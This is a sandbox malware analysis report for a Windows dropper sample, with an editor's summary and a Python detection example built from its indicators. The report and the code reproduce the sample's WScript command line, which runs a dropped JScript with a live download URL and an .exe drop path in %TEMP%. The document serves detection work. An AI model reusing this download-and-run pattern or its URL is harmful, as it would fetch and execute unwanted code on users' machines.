Malware Analysis Report

2025-08-05 22:21

Sample ID 240611-fdqdkavhlm
Target 9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118
SHA256 60c1fa3596584a9dd18663cf5f312f25cae53171c14a040f093081475659a1bd
Tags
execution
score
8/10


Analysis Overview

score
8/10

SHA256

60c1fa3596584a9dd18663cf5f312f25cae53171c14a040f093081475659a1bd

Threat Level: Likely malicious

The file 9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118 was found to be: Likely malicious.

Editor's summary of what the two detonations below record: the sample is an unsigned PE that writes a JScript file to %TEMP% (fuf114F.js on Windows 7, fuf4031.js on Windows 10; both have SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e, so the script itself is a stable indicator) and runs it through WScript.exe, passing on the command line a download URL on www.djapp.info (query parameters domain, dotnet, file=installer, ip, pub_id, setup_id, srcid, names that read like installer/affiliate tracking) and a target path for the payload (fuf114F.exe / fuf4031.exe). WScript.exe is launched five times in each run, and the parent then crashes (WerFault.exe -p 1288 / -p 1964). Neither run records a TCP connection to www.djapp.info, only DNS queries for it; the TCP traffic that is recorded goes to bi.downthat.com and www.hugedomains.com, and the only page content cached under Temporary Internet Files is domain_profile[1].htm. No fuf114F.exe or fuf4031.exe appears in the dropped-files list, so the second stage was not obtained in the sandbox; the dropped .js, the URL and the two contacted hosts are the actionable indicators.

One detail for anyone writing a rule from the Processes section: the command line names C:\Windows\System32\WScript.exe, but the process image is C:\Windows\SysWOW64\WScript.exe. The parent is 32-bit, so WOW64 file-system redirection applied; match on the image path or the basename, not on the literal System32 string in the command line.

Malicious Activity Summary

execution

Blocklisted process makes network request

Checks computer location settings

Unsigned PE

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Program crash

Suspicious use of WriteProcessMemory

Modifies registry class


Analysis: static1

Detonation Overview

Reported

2024-06-11 04:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-11 04:45

Reported

2024-06-11 04:48

Platform

win7-20240215-en

Max time kernel

121s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe"

Signatures

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1288 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 1288 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 1288 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 1288 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 556
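The WScript.exe launch line above is the most useful artifact in this run: the parent passes the dropped script a download URL and a target path as arguments, so the script is a generic downloader driven by its command line. The following is an added example by the editor, not code from the sandbox or the report; it tokenizes that command line the way Windows does for double-quoted arguments, pulls out the script path, the URL host and query parameters and the drop path, applies a small detection predicate (script host plus script in %TEMP%, URL argument, .exe output in %TEMP%), and collapses the one-row-per-call WriteProcessMemory table into one entry per child PID. The WPM rows are rebuilt from the report's own format for a subset of targets (1700, 2580, 1484); the thresholds in the predicate are the editor's choice.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# WScript.exe launch line exactly as listed under Processes (behavioral1).
WSCRIPT_CMDLINE = (
    r'"C:\Windows\System32\WScript.exe" '
    r'"C:\Users\Admin\AppData\Local\Temp\fuf114F.js" '
    r'http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer'
    r'&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5'
    r'fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80'
    r'ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF '
    r'C:\Users\Admin\AppData\Local\Temp\fuf114F.exe'
)

# Subset of the WriteProcessMemory rows, rebuilt in the report's row format
# (4 calls per child: two WScript.exe children and the WerFault.exe child).
PARENT_IMAGE = (r"C:\Users\Admin\AppData\Local\Temp"
                r"\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe")
WPM_ROWS = [
    f"PID 1288 wrote to memory of {pid} N/A {PARENT_IMAGE} {child}"
    for pid, child in [(1700, r"C:\Windows\SysWOW64\WScript.exe")] * 4
    + [(2580, r"C:\Windows\SysWOW64\WScript.exe")] * 4
    + [(1484, r"C:\Windows\SysWOW64\WerFault.exe")] * 4
]

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf")
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
WPM_ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")


def split_windows_cmdline(cmdline):
    """Split a Windows command line: a double-quoted run is one argument
    (quotes stripped), everything else splits on whitespace."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def analyse_script_launch(cmdline):
    """Return indicators and a verdict for a WScript/CScript launch line,
    or None when the image is not a script host."""
    args = split_windows_cmdline(cmdline)
    if not args:
        return None
    image = args[0].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return None
    rest = args[1:]
    script = next((a for a in rest if a.lower().endswith(SCRIPT_EXTS)), None)
    url = next((a for a in rest if a.lower().startswith(("http://", "https://"))), None)
    drop = next((a for a in rest if a.lower().endswith(".exe")), None)
    host, params = None, {}
    if url:
        parts = urlsplit(url)
        host = parts.hostname
        params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    reasons = []
    if script and TEMP_DIR_RE.search(script):
        reasons.append("script executed from %TEMP%")
    if url:
        reasons.append("URL passed to the script as an argument")
    if drop and TEMP_DIR_RE.search(drop):
        reasons.append(".exe output path in %TEMP%")
    return {
        "script_host": image, "script": script, "url": url, "url_host": host,
        "url_params": params, "drop_path": drop, "reasons": reasons,
        # Editor's threshold: any two of the three traits is enough to alert.
        "suspicious": len(reasons) >= 2,
    }


def children_from_wpm_rows(rows):
    """Collapse one-row-per-call WriteProcessMemory rows into
    {target_pid: (call_count, target_image_basename)}."""
    calls, image = Counter(), {}
    for row in rows:
        m = WPM_ROW_RE.match(row)
        if not m:
            continue
        _src, dst, _src_image, dst_image = m.groups()
        calls[int(dst)] += 1
        image[int(dst)] = dst_image.rsplit("\\", 1)[-1]
    return {pid: (calls[pid], image[pid]) for pid in calls}


if __name__ == "__main__":
    verdict = analyse_script_launch(WSCRIPT_CMDLINE)
    print(verdict["suspicious"], verdict["reasons"])
    print(verdict["url_host"], verdict["url_params"], verdict["drop_path"])
    print(children_from_wpm_rows(WPM_ROWS))
```

The predicate keys on the image basename rather than the System32 path in the command line, which is what survives WOW64 redirection (the image here is SysWOW64\WScript.exe). The query-parameter dictionary is where the pay-per-install style fields (pub_id, setup_id, srcid) end up, which is what you would pivot on across other samples.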

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 3.94.41.167:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
US 172.67.70.191:443 www.hugedomains.com tcp
US 3.94.41.167:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 3.94.41.167:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 3.94.41.167:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 3.94.41.167:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\fuf114F.js

MD5 3813cab188d1de6f92f8b82c2059991b
SHA1 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm

MD5 a11395f7801c68fc08a42adb49b4965e
SHA1 0c74ca1cdff73ee75d673be8392f684cb940424a
SHA256 0f0872262930f542ec7bc30f72ff445d2b4746cf09559dbea45f5d0d0e9313b8
SHA512 3311e87431fa28cd668fabbd20616587edf18e7f4b4f57a54bbc5e4f3b341be21b8aa5cb63f24402623ffb1af99fd2b3d45fbb67ee7580122487857e525a916d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\NI3ZJXGP.txt

MD5 80b3ebbd38856710320e1b7fd40f95c8
SHA1 4d92012155fa1c890a8f957c5c62ba9fc815cdcb
SHA256 31b02e14b8accdfdeeeb386b7ce02c875343d32051f3a530b242888c9697e666
SHA512 fa488fcfea6783af2f4fa8ecf0fac39076f29cfaea930892999404df5778898ad8bd2347c6b56a909ab40877e2752ac507b3a905d4645c9c19dcd05e37544f8d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 99ea8df7fc53ad6cf1911727b0792df3
SHA1 4bf99bdab1bb518d68d6348656ab1fe99026e523
SHA256 fb5d2e21e58711e3397f66d7ba1a54e85785176a5d7496827e18cde5ee0fa297
SHA512 f50c8feb6278ab5ad97c75d90de275f985f190a008c6f42c5393f269373890ee22e0f29babbd146dc6f139c1cdd5608ddb19223664e060ac0e52d9c5c3790e58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8f0cf3b71a451da3e7af0bb4e0bb4ffd
SHA1 5575484c9272d9fed909e90939b89fa877fe409a
SHA256 0adc93cc3123c74a31ccb8beb4817f2c9211429540defd2d107403035b18bfd0
SHA512 852b96c736cd8203ce2e16f7e18862d49cbdd7acaa347d9df3fdf76c0d5b44ef4b12c1160ba86722a95ef595d0b37e78c4d489cf480af12a0fa4c9ecf07e38ae

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 de9270c4fb4e097ccfcaf6aae02263e7
SHA1 6464fd7978f85caa0b5009870c2bdece33b416f5
SHA256 499b51512a779635f5f17495011fae2970879395c31223ef0cc4553de77ca93e
SHA512 44a5ad9b6055801bbea6445cd4c6a429296948df152c005527437a57a726c7dad28ea8762d6265b8443b2ccc63ae4e2a892fccd028ea534a0a75868043a12292

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 61442f25854d3a90e776e2858a8d179d
SHA1 17ba1314fc0778a6e8df6dc17d14ca93515d91bd
SHA256 bca86280bbd294f04935238e52545a2e9f6f1b22c66695b4f0f937857476e9a8
SHA512 682278934ce25bdf5a2751d95d7c15b4edf4e42e5ec40ed824a539fbdac4b11fa611e2d9723d9c138ecb66529e5275ac229c6f6df936f4adb856943b16dd9fde

C:\Users\Admin\AppData\Local\Temp\Cab40C8.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm

MD5 497c745764e5e2f5a2f758a154447563
SHA1 b2d90a47d3cba6be321dbef5517db4d707d81383
SHA256 0c791e92516955d33748798234a3bde2e89aafd7d7332bc4b002e68d28ee1e79
SHA512 d9be8e7638fd93acfd46014c5d382d52cadef4936a2a66ac5e4cad4cfe4772cb89cfe610566323f2bf9700d4c9d73c367b920b2dea26f9c40800f05cb2fdee58

C:\Users\Admin\AppData\Local\Temp\Tar5909.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm

MD5 6c4a2100fac8650c3e091f14b67f66dc
SHA1 27ac6da44057312d651c360720da64213fe54f10
SHA256 73b4bbbb8724207a4298fede2ece8df65a3581e3cd27b3220d3a15663bbce86c
SHA512 9da9629c43c3dfe7fa8e96384638d469b5b8e7a7798e407712eac7d9696e395c5d388d4e9f390ba2ae2ff4f926a81a31be630b098bf7bbff90da9f9b854642d4

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm

MD5 5d2897dbff252c55f28a7934e1281a71
SHA1 2965d8a0dc07e4760db0683fe2ff1d782130ebde
SHA256 e72115813298377ab36616a7cbfa996b691a4d704966604ce47017ebd954a436
SHA512 098554ed37dc00580dce916941ce71b52874a8382e4aa9c54349b15bdfaa93a54855b2223831f8e497b27d93f45f314ec836d077b41dc5ba45473321146f0be5

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-11 04:45

Reported

2024-06-11 04:48

Platform

win10v2004-20240226-en

Max time kernel

141s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1964 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1416 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1964 -ip 1964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1452

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
